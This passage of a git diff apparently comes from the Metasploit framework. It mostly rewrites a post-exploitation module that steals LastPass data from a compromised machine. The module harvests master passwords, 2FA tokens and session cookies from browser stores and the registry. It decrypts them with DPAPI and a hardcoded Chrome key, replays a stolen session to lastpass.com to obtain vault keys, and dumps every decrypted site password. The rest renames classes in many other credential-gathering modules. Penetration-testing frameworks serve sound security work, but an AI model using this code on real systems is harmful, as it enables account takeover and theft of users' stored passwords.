/user_pref\("extensions.lastpass.loginpws", "(?<encoded_creds>.*)"\);/ =~ line - creds_per_user = encoded_creds.split("|") - creds_per_user.each do |user_creds| - parts = user_creds.split('=') - # Any valid credentials present? - credentials << parts if parts.size > 1 - end - else - next + data = nil + + if prefs_path.nil? # IE + data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginUsers") + data = read_registry_key_value('HKEY_CURRENT_USER\Software\LastPass', "LoginUsers") if data.blank? + return [] if data.blank? + + usernames = data.split("|") + usernames.each do |username| + credentials << [username, nil] end + + # Extract master passwords + data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginPws") + data = Rex::Text.encode_base64(data) unless data.blank? + else # Firefox + loot_path = loot_file(prefs_path, nil, 'firefox.preferences', "text/javascript", "Firefox preferences file") + return [] unless loot_path + File.readlines(loot_path).each do |line| + if /user_pref\("extensions.lastpass.loginusers", "(?<encoded_users>.*)"\);/ =~ line + usernames = encoded_users.split("|") + usernames.each do |username| + credentials << [username, nil] + end + break + end + end + + # Extract master passwords + path = localstorage_db_path + system_separator + "lp.loginpws" + data = read_remote_file(path) if file?(path) # Read file if it exists end + # Get encrypted master passwords + data = windows_unprotect(data) if data != nil && data.match(/^AQAAA.+/) # Verify Windows protection + return credentials if data.blank? # No passwords stored + creds_per_user = data.split("|") + creds_per_user.each_with_index do |user_creds, index| + parts = user_creds.split('=') + for creds in credentials + creds[1] = parts[1] if creds[0] == parts[0] # Add the password to the existing username + end + end credentials end - # Decrypts the password - def clear_text_password(email, encrypted_data) - return if encrypted_data.blank? + def decrypt_data(key, encrypted_data) + return nil if encrypted_data.blank? - sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(email) - sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin - - if encrypted_data.include?("|") # Apply CBC + if encrypted_data.include?("|") # Use CBC decipher = OpenSSL::Cipher.new("AES-256-CBC") - decipher.decrypt - decipher.key = sha256_binary_email # The key is the emails hashed to SHA256 and converted to binary - decipher.iv = Base64.decode64(encrypted_data[1, 24]) # Discard ! and | - encrypted_password = encrypted_data[26..-1] - else # Apply ECB + decipher.iv = Rex::Text.decode_base64(encrypted_data[1, 24]) # Discard ! and | + encrypted_data = encrypted_data[26..-1] # Take only the data part + else # Use ECB decipher = OpenSSL::Cipher.new("AES-256-ECB") - decipher.decrypt - decipher.key = sha256_binary_email - encrypted_password = encrypted_data end begin - decipher.update(Base64.decode64(encrypted_password)) + decipher.final - rescue - print_error "Password for #{email} could not be decrypted" + decipher.decrypt + decipher.key = key + decrypted_data = decipher.update(Rex::Text.decode_base64(encrypted_data)) + decipher.final + rescue OpenSSL::Cipher::CipherError => e + vprint_error "Data could not be decrypted. #{e.message}" + end + + decrypted_data + end + + def extract_credentials(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + account_map[account][browser]['lp_creds'] = {} + if browser.match(/Firefox|IE/) + if browser == "Firefox" + ieffcreds = ie_firefox_credentials(lp_data['lp_db_path'].first, lp_data['localstorage_db']) + else # IE + ieffcreds = ie_firefox_credentials(nil, lp_data['localstorage_db']) + end + unless ieffcreds.blank? + ieffcreds.each do |creds| + if creds[1].blank? # No master password found + account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = { 'lp_password' => nil } + else + sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(URI.unescape(creds[0])) + sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin + creds[1] = decrypt_data(sha256_binary_email, URI.unescape(creds[1])) + account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = { 'lp_password' => creds[1] } + end + end + end + else # Chrome, Safari and Opera + loot_path = loot_file(lp_data['lp_db_path'], nil, "#{browser.downcase}.lastpass.database", "application/x-sqlite3", "#{account}'s #{browser} LastPass database #{lp_data['lp_db_path']}") + account_map[account][browser]['lp_db_loot'] = loot_path + next if loot_path.blank? + # Parsing/Querying the DB + db = SQLite3::Database.new(loot_path) + result = db.execute( + "SELECT username, password FROM LastPassSavedLogins2 " \ + "WHERE username IS NOT NULL AND username != '' " \ + ) + + for row in result + if row[0] + sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(row[0]) + sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin + row[1].blank? ? row[1] = nil : row[1] = decrypt_data(sha256_binary_email, row[1]) # Decrypt master password + account_map[account][browser]['lp_creds'][row[0]] = { 'lp_password' => row[1] } + end + end + end + end end end + + # Extracts the 2FA token from localStorage + def extract_2fa_tokens(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + if browser.match(/Firefox|IE/) + path = lp_data['localstorage_db'] + system_separator + "lp.suid" + data = read_remote_file(path) if file?(path) # Read file if it exists + data = windows_unprotect(data) if data != nil && data.size > 32 # Verify Windows protection + loot_path = loot_file(nil, data, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") + account_map[account][browser]['lp_2fa'] = data + else # Chrome, Safari and Opera + loot_path = loot_file(lp_data['localstorage_db'], nil, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") + unless loot_path.blank? + db = SQLite3::Database.new(loot_path) + token = db.execute( + "SELECT hex(value) FROM ItemTable " \ + "WHERE key = 'lp.uid';" + ).flatten + end + token.blank? ? account_map[account][browser]['lp_2fa'] = nil : account_map[account][browser]['lp_2fa'] = token.pack('H*') + end + end + end + end + + # Print all extracted LastPass data + def print_lastpass_data(account_map) + lastpass_data_table = Rex::Ui::Text::Table.new( + 'Header' => "LastPass Accounts", + 'Indent' => 1, + 'Columns' => %w(Account LP_Username LP_Password LP_2FA LP_Key) + ) + + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + lp_data['lp_creds'].each_pair do |username, user_data| + lastpass_data_table << [account, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']] + end + end + end + + unless account_map.empty? + print_good lastpass_data_table.to_s + loot_file(nil, lastpass_data_table.to_csv, "lastpass.data", "text/csv", "LastPass Data") + print_vault_passwords(account_map) + end + end + + def extract_vault_and_iterations(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + lp_data['lp_creds'].each_pair do |username, user_data| + if browser.match(/Firefox|IE/) + if browser == "Firefox" + iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" + vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" + else # IE + iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr" + vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" + end + iterations = read_remote_file(iterations_path) if file?(iterations_path) # Read file if it exists + iterations = nil if iterations.blank? # Verify content + lp_data['lp_creds'][username]['iterations'] = iterations + + # Find encrypted vault + vault = read_remote_file(vault_path) + vault = windows_unprotect(vault) if vault != nil && vault.match(/^AQAAA.+/) # Verify Windows protection + vault = vault.sub(/iterations=.*;/, "") if file?(vault_path) # Remove iterations info + loot_path = loot_file(nil, vault, "#{browser.downcase}.lastpass.vault", "text/plain", "#{account}'s #{browser} LastPass vault") + lp_data['lp_creds'][username]['vault_loot'] = loot_path + + else # Chrome, Safari and Opera + db = SQLite3::Database.new(lp_data['lp_db_loot']) + result = db.execute( + "SELECT data FROM LastPassData " \ + "WHERE username_hash = ? AND type = 'accts'", OpenSSL::Digest::SHA256.hexdigest(username) + ) + + if result.size == 1 && !result[0].blank? + if /iterations=(?<iterations>.*);(?<vault>.*)/ =~ result[0][0] + lp_data['lp_creds'][username]['iterations'] = iterations + else + lp_data['lp_creds'][username]['iterations'] = 1 + end + loot_path = loot_file(nil, vault, "#{browser.downcase}.lastpass.vault", "text/plain", "#{account}'s #{browser} LastPass vault") + lp_data['lp_creds'][username]['vault_loot'] = loot_path + else + lp_data['lp_creds'][username]['iterations'] = nil + lp_data['lp_creds'][username]['vault_loot'] = nil + end + end + end + end + end + end + + def extract_vault_keys(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + browser_checked = false # Track if local stored vault key was already decrypted for this browser (only one session cookie) + lp_data['lp_creds'].each_pair do |username, user_data| + if !user_data['lp_password'].blank? && user_data['iterations'] != nil # Derive vault key from credentials + lp_data['lp_creds'][username]['vault_key'] = derive_vault_key_from_creds(username, lp_data['lp_creds'][username]['lp_password'], user_data['iterations']) + else # Get vault key decrypting the locally stored one or from the disabled OTP + unless browser_checked + decrypt_local_vault_key(account, browser_map) + browser_checked = true + end + if lp_data['lp_creds'][username]['vault_key'].nil? # If no vault key was found yet, try with dOTP + otpbin = extract_otpbin(browser, username, lp_data) + otpbin.blank? ? next : otpbin = otpbin[0..31] + lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otpbin) + end + end + end + end + end + end + + # Decrypt the locally stored vault key + def decrypt_local_vault_key(account, browser_map) + data = nil + session_cookie_value = nil + + browser_map.each_pair do |browser, lp_data| + if browser == "IE" && directory?(lp_data['cookies_db']) + cookies_files = dir(lp_data['cookies_db']) + cookies_files.reject! { |u| %w(. ..).include?(u) } + cookies_files.each do |cookie_jar_file| + data = read_remote_file(lp_data['cookies_db'] + system_separator + cookie_jar_file) + next if data.blank? + if /.*PHPSESSID.(?<session_cookie_value_match>.*?).lastpass\.com?/m =~ data # Find the session id + loot_file(lp_data['cookies_db'] + system_separator + cookie_jar_file, nil, "#{browser.downcase}.lastpass.cookies", "text/plain", "#{account}'s #{browser} cookies DB") + session_cookie_value = session_cookie_value_match + break + end + end + else + case browser + when /Chrome/ + query = "SELECT encrypted_value FROM cookies WHERE host_key = 'lastpass.com' AND name = 'PHPSESSID'" + when "Opera" + query = "SELECT encrypted_value FROM cookies WHERE host_key = 'lastpass.com' AND name = 'PHPSESSID'" + when "Firefox" + query = "SELECT value FROM moz_cookies WHERE host = 'lastpass.com' AND name = 'PHPSESSID'" + else + vprint_error "Browser #{browser} not supported for cookies" + next + end + # Parsing/Querying the DB + loot_path = loot_file(lp_data['cookies_db'], nil, "#{browser.downcase}.lastpass.cookies", "application/x-sqlite3", "#{account}'s #{browser} cookies DB") + next if loot_path.blank? + db = SQLite3::Database.new(loot_path) + begin + result = db.execute(query) + rescue SQLite3::SQLException => e + vprint_error "No session cookie was found in #{account}'s #{browser} (#{e.message})" + next + end + next if result.blank? # No session cookie found for this browser + session_cookie_value = result[0][0] + end + return if session_cookie_value.blank? + + # Check if cookie value needs to be decrypted + if Rex::Text.encode_base64(session_cookie_value).match(/^AQAAA.+/) # Windows Data protection API + session_cookie_value = windows_unprotect(Rex::Text.encode_base64(session_cookie_value)) + elsif session_cookie_value.match(/^v10/) && browser.match(/Chrome|Opera/) # Chrome/Opera encrypted cookie in Linux + begin + decipher = OpenSSL::Cipher.new("AES-256-CBC") + decipher.decrypt + decipher.key = OpenSSL::Digest::SHA256.hexdigest("peanuts") + decipher.iv = " " * 16 + session_cookie_value = session_cookie_value[3..-1] # Discard v10 + session_cookie_value = decipher.update(session_cookie_value) + decipher.final + rescue OpenSSL::Cipher::CipherError => e + print_error "Cookie could not be decrypted. #{e.message}" + end + end + + # Use the cookie to obtain the encryption key to decrypt the vault key + uri = URI('https://lastpass.com/login_check.php') + request = Net::HTTP::Post.new(uri) + request.set_form_data("wxsessid" => URI.unescape(session_cookie_value), "uuid" => browser_map['lp_2fa']) + request.content_type = 'application/x-www-form-urlencoded; charset=UTF-8' + response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) { |http| http.request(request) } + + # Parse response + next unless response.body.match(/pwdeckey\="([a-z0-9]+)"/) # Session must have expired + decryption_key = OpenSSL::Digest::SHA256.hexdigest(response.body.match(/pwdeckey\="([a-z0-9]+)"/)[1]) + username = response.body.match(/lpusername="([A-Za-z0-9._%+-@]+)"/)[1] + + # Get the local encrypted vault key + encrypted_vault_key = extract_local_encrypted_vault_key(browser, username, lp_data) + + # Decrypt the local stored key + lp_data['lp_creds'][username]['vault_key'] = decrypt_data([decryption_key].pack("H*"), encrypted_vault_key) + end + end + + # Returns otp, encrypted_key + def extract_otpbin(browser, username, lp_data) + if browser.match(/Firefox|IE/) + if browser == "Firefox" + path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" + else # IE + path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + ".sotp" + end + otpbin = read_remote_file(path) if file?(path) # Read file if it exists + otpbin = windows_unprotect(otpbin) if otpbin != nil && otpbin.match(/^AQAAA.+/) + return otpbin + else # Chrome, Safari and Opera + db = SQLite3::Database.new(lp_data['lp_db_loot']) + result = db.execute( + "SELECT type, data FROM LastPassData " \ + "WHERE username_hash = ? AND type = 'otp'", OpenSSL::Digest::SHA256.hexdigest(username) + ) + return (result.blank? || result[0][1].blank?) ? nil : [result[0][1]].pack("H*") + end + end + + def derive_vault_key_from_creds(username, password, key_iteration_count) + if key_iteration_count == 1 + key = Digest::SHA256.hexdigest username + password + else + key = pbkdf2(password, username, key_iteration_count.to_i, 32).first + end + key + end + + def decrypt_vault_key_with_otp(username, otpbin) + vault_key_decryption_key = [lastpass_sha256(username + otpbin)].pack "H*" + encrypted_vault_key = retrieve_encrypted_vault_key_with_otp(username, otpbin) + decrypt_data(vault_key_decryption_key, encrypted_vault_key) + end + + def retrieve_encrypted_vault_key_with_otp username, otpbin + # Derive login hash from otp + otp_token = lastpass_sha256(lastpass_sha256(username + otpbin) + otpbin) # OTP login hash + + # Make request to LastPass + uri = URI('https://lastpass.com/otp.php') + request = Net::HTTP::Post.new(uri) + request.set_form_data("login" => 1, "xml" => 1, "hash" => otp_token, "otpemail" => URI.escape(username), "outofbandsupported" => 1, "changepw" => otp_token) + request.content_type = 'application/x-www-form-urlencoded; charset=UTF-8' + response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) { |http| http.request(request) } + + # Parse response + encrypted_vault_key = nil + if response.body.match(/randkey\="(.*)"/) + encrypted_vault_key = response.body.match(/randkey\="(.*)"/)[1] + end + encrypted_vault_key + end + + # LastPass does some preprocessing (UTF8) when doing a SHA256 on special chars (binary) + def lastpass_sha256(input) + output = "" + + input = input.gsub("\r\n", "\n") + + input.each_byte do |e| + if 128 > e + output += e.chr + else + if (127 < e && 2048 > e) + output += (e >> 6 | 192).chr + output += (e & 63 | 128).chr + else + output += (e >> 12 | 224).chr + output += (e >> 6 & 63 | 128).chr + end + end + end + + OpenSSL::Digest::SHA256.hexdigest(output) + end + + def pbkdf2(password, salt, iterations, key_length) + digest = OpenSSL::Digest::SHA256.new + OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, key_length, digest).unpack 'H*' + end + + def windows_unprotect(data) + data = Rex::Text.decode_base64(data) + rg = session.railgun + pid = session.sys.process.getpid + process = session.sys.process.open(pid, PROCESS_ALL_ACCESS) + mem = process.memory.allocate(data.length + 200) + process.memory.write(mem, data) + + if session.sys.process.each_process.find { |i| i["pid"] == pid } ["arch"] == "x86" + addr = [mem].pack("V") + len = [data.length].pack("V") + ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8) + len, addr = ret["pDataOut"].unpack("V2") + else + addr = Rex::Text.pack_int64le(mem) + len = Rex::Text.pack_int64le(data.length) + ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16) + pData = ret["pDataOut"].unpack("VVVV") + len = pData[0] + (pData[1] << 32) + addr = pData[2] + (pData[3] << 32) + end + + return "" if len == 0 + process.memory.read(addr, len) + end + + def print_vault_passwords(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + lp_data['lp_creds'].each_pair do |username, user_data| + lastpass_vault_data_table = Rex::Ui::Text::Table.new( + 'Header' => "Decrypted vault from #{username}", + 'Indent' => 1, + 'Columns' => %w(URL Username Password) + ) + if user_data['vault_loot'].nil? # Was a vault found? + print_error "No vault was found for #{username}" + next + end + encoded_vault = File.read(user_data['vault_loot']) + if encoded_vault[0] == "!" # Vault is double encrypted + encoded_vault = decrypt_data([user_data['vault_key']].pack("H*"), encoded_vault) + if encoded_vault.blank? + print_error "Vault from #{username} could not be decrypted" + next + else + encoded_vault = encoded_vault.sub("LPB64", "") + end + end + + # Parse vault + vault = Rex::Text.decode_base64(encoded_vault) + vault.scan(/ACCT/) do |result| + chunk_length = vault[$~.offset(0)[1]..$~.offset(0)[1] + 3].unpack("H*").first.to_i(16) # Get the length in base 10 of the ACCT chunk + chunk = vault[$~.offset(0)[0]..$~.offset(0)[1] + chunk_length] # Get ACCT chunk + account_data = parse_vault_account(chunk, user_data['vault_key']) + lastpass_vault_data_table << account_data if account_data != nil + end + + unless account_map.empty? # Loot passwords + if lastpass_vault_data_table.rows.empty? + print_status('No decrypted vaults.') + else + print_good lastpass_vault_data_table.to_s + end + loot_file(nil, lastpass_vault_data_table.to_csv, "#{browser.downcase}.lastpass.passwords", "text/csv", "LastPass Vault Passwords from #{username}") + end + end + end + end + end + + def parse_vault_account(chunk, vault_key) + pointer = 22 # Starting position to find data to decrypt + labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"] + vault_data = [] + for label in labels + if chunk[pointer..pointer + 3].nil? + # Out of bound read + return nil + end + + length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16) + encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1] + label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") + decrypted_data = "" if decrypted_data.nil? + vault_data << decrypted_data if (label == "url" || label == "username" || label == "password") + pointer = pointer + 4 + length + end + + return vault_data[0] == "http://sn" ? nil : vault_data # TODO: Support secure notes + end + + def decrypt_vault_password(key, encrypted_data) + return nil if key.blank? || encrypted_data.blank? + + if encrypted_data[0] == "!" # Apply CBC + decipher = OpenSSL::Cipher.new("AES-256-CBC") + decipher.iv = encrypted_data[1, 16] # Discard ! + encrypted_data = encrypted_data[17..-1] + else # Apply ECB + decipher = OpenSSL::Cipher.new("AES-256-ECB") + end + decipher.decrypt + decipher.key = [key].pack "H*" + + begin + return decipher.update(encrypted_data) + decipher.final + rescue OpenSSL::Cipher::CipherError + vprint_error "Vault password could not be decrypted with key #{key}" + return nil + end + end + + # Reads a remote file and loots it + def loot_file(path, data, title, type, description) + data = read_remote_file(path) if data.nil? # If no data is passed, read remote file + return nil if data.nil? + + loot_path = store_loot( + title, + type, + session, + data, + nil, + description + ) + loot_path + end + + # Reads a remote file and returns the data + def read_remote_file(path) + data = nil + + begin + data = read_file(path) + rescue EOFError + vprint_error "Error reading file #{path} It could be empty" + end + data + end + + def read_registry_key_value(key, value) + begin + root_key, base_key = session.sys.registry.splitkey(key) + reg_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) + return nil unless reg_key + reg_value = reg_key.query_value(value) + return nil unless reg_value + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error("#{e.message} (#{key}\\#{value})") + end + reg_key.close if reg_key + return reg_value.blank? ? nil : reg_value.data + end + + def extract_local_encrypted_vault_key(browser, username, lp_data) + if browser.match(/Firefox|IE/) + encrypted_key_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lpall.slps" + encrypted_vault_key = read_remote_file(encrypted_key_path) + encrypted_vault_key = windows_unprotect(encrypted_vault_key) if encrypted_vault_key != nil && encrypted_vault_key.match(/^AQAAA.+/) # Verify Windows protection + else + db = SQLite3::Database.new(lp_data['lp_db_loot']) + result = db.execute( + "SELECT data FROM LastPassData " \ + "WHERE username_hash = ? AND type = 'key'", OpenSSL::Digest::SHA256.hexdigest(username) + ) + encrypted_vault_key = result[0][0] + end + + return encrypted_vault_key.blank? ? nil : encrypted_vault_key.split("\n")[0] # Return only the key, not the "lastpass rocks" part + end + + # Returns OS separator in a session type agnostic way + def system_separator + return session.platform =~ /win/ ? '\\' : '/' + end end diff --git a/modules/post/multi/gather/multi_command.rb b/modules/post/multi/gather/multi_command.rb index c16ef69a6c..3f6808328b 100644 --- a/modules/post/multi/gather/multi_command.rb +++ b/modules/post/multi/gather/multi_command.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/netrc_creds.rb b/modules/post/multi/gather/netrc_creds.rb index 4bd3f3e381..57bda43abc 100644 --- a/modules/post/multi/gather/netrc_creds.rb +++ b/modules/post/multi/gather/netrc_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb index 09c3450e84..2ad6857412 100644 --- a/modules/post/multi/gather/pgpass_creds.rb +++ b/modules/post/multi/gather/pgpass_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/pidgin_cred.rb b/modules/post/multi/gather/pidgin_cred.rb index 437ea9b73a..4d2e4a4ef4 100644 --- a/modules/post/multi/gather/pidgin_cred.rb +++ b/modules/post/multi/gather/pidgin_cred.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb index 1c76b839a8..39feb3399d 100644 --- a/modules/post/multi/gather/ping_sweep.rb +++ b/modules/post/multi/gather/ping_sweep.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/remmina_creds.rb b/modules/post/multi/gather/remmina_creds.rb index a7f9b7ff42..b8e72f70a5 100644 --- a/modules/post/multi/gather/remmina_creds.rb +++ b/modules/post/multi/gather/remmina_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/resolve_hosts.rb b/modules/post/multi/gather/resolve_hosts.rb index a5ccaa1a6c..7eefecdb1b 100644 --- a/modules/post/multi/gather/resolve_hosts.rb +++ b/modules/post/multi/gather/resolve_hosts.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/rsyncd_creds.rb b/modules/post/multi/gather/rsyncd_creds.rb index ee0736848e..dafcb3aa48 100644 --- a/modules/post/multi/gather/rsyncd_creds.rb +++ b/modules/post/multi/gather/rsyncd_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/rubygems_api_key.rb b/modules/post/multi/gather/rubygems_api_key.rb index bd732bdbe5..422ccce460 100644 --- a/modules/post/multi/gather/rubygems_api_key.rb +++ b/modules/post/multi/gather/rubygems_api_key.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/run_console_rc_file.rb b/modules/post/multi/gather/run_console_rc_file.rb index 771391e748..dcefb554a0 100644 --- a/modules/post/multi/gather/run_console_rc_file.rb +++ b/modules/post/multi/gather/run_console_rc_file.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index b07ccd6090..578855b1f4 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -11,7 +11,7 @@ require 'csv' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb index b5746e929e..ceb2ccf86a 100644 --- a/modules/post/multi/gather/ssh_creds.rb +++ b/modules/post/multi/gather/ssh_creds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'sshkey' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb index bcda33c4ac..00c2fb9c20 100644 --- a/modules/post/multi/gather/thunderbird_creds.rb +++ b/modules/post/multi/gather/thunderbird_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index cdb498623a..c5858ff51f 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/google/geolocation' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/close.rb b/modules/post/multi/general/close.rb index 443f40d0b0..33720b0c42 100644 --- a/modules/post/multi/general/close.rb +++ b/modules/post/multi/general/close.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/execute.rb b/modules/post/multi/general/execute.rb index 0318bda57e..2f3c39248d 100644 --- a/modules/post/multi/general/execute.rb +++ b/modules/post/multi/general/execute.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/wall.rb b/modules/post/multi/general/wall.rb index 563ccfe3c3..d9f7b32f6e 100644 --- a/modules/post/multi/general/wall.rb +++ b/modules/post/multi/general/wall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info = {}) super( update_info( diff --git a/modules/post/multi/manage/dbvis_add_db_admin.rb b/modules/post/multi/manage/dbvis_add_db_admin.rb index eb8d5f1956..ef965c3053 100644 --- a/modules/post/multi/manage/dbvis_add_db_admin.rb +++ b/modules/post/multi/manage/dbvis_add_db_admin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/manage/dbvis_query.rb b/modules/post/multi/manage/dbvis_query.rb index ebc9518926..efed0c9bcf 100644 --- a/modules/post/multi/manage/dbvis_query.rb +++ b/modules/post/multi/manage/dbvis_query.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/manage/multi_post.rb b/modules/post/multi/manage/multi_post.rb index fd93ae6132..69f450a4de 100644 --- a/modules/post/multi/manage/multi_post.rb +++ b/modules/post/multi/manage/multi_post.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index 0c5d85ce3d..492d18e8ed 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], - 'Platform' => [ 'win', 'osx', 'linux' ], + 'Platform' => [ 'win', 'osx', 'linux', 'android' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) @@ -94,6 +94,19 @@ class Metasploit3 < Msf::Post true end + # + # The Android version is launched via an Intent + # + def android_start_video(id) + intenturl = "intent://youtube.com/watch?v=#{id}&autoplay=1#Intent;scheme=http;action=android.intent.action.VIEW;end" + begin + session.android.activity_start(intenturl) + rescue Rex::Post::Meterpreter::RequestError => e + return false + end + true + end + def start_video(id) case session.platform when /osx/ @@ -102,6 +115,8 @@ class Metasploit3 < Msf::Post win_start_video(id) when /linux/ linux_start_video(id) + when /android/ + android_start_video(id) end end diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index bce65e61da..442fc81efc 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/multi/manage/set_wallpaper.rb 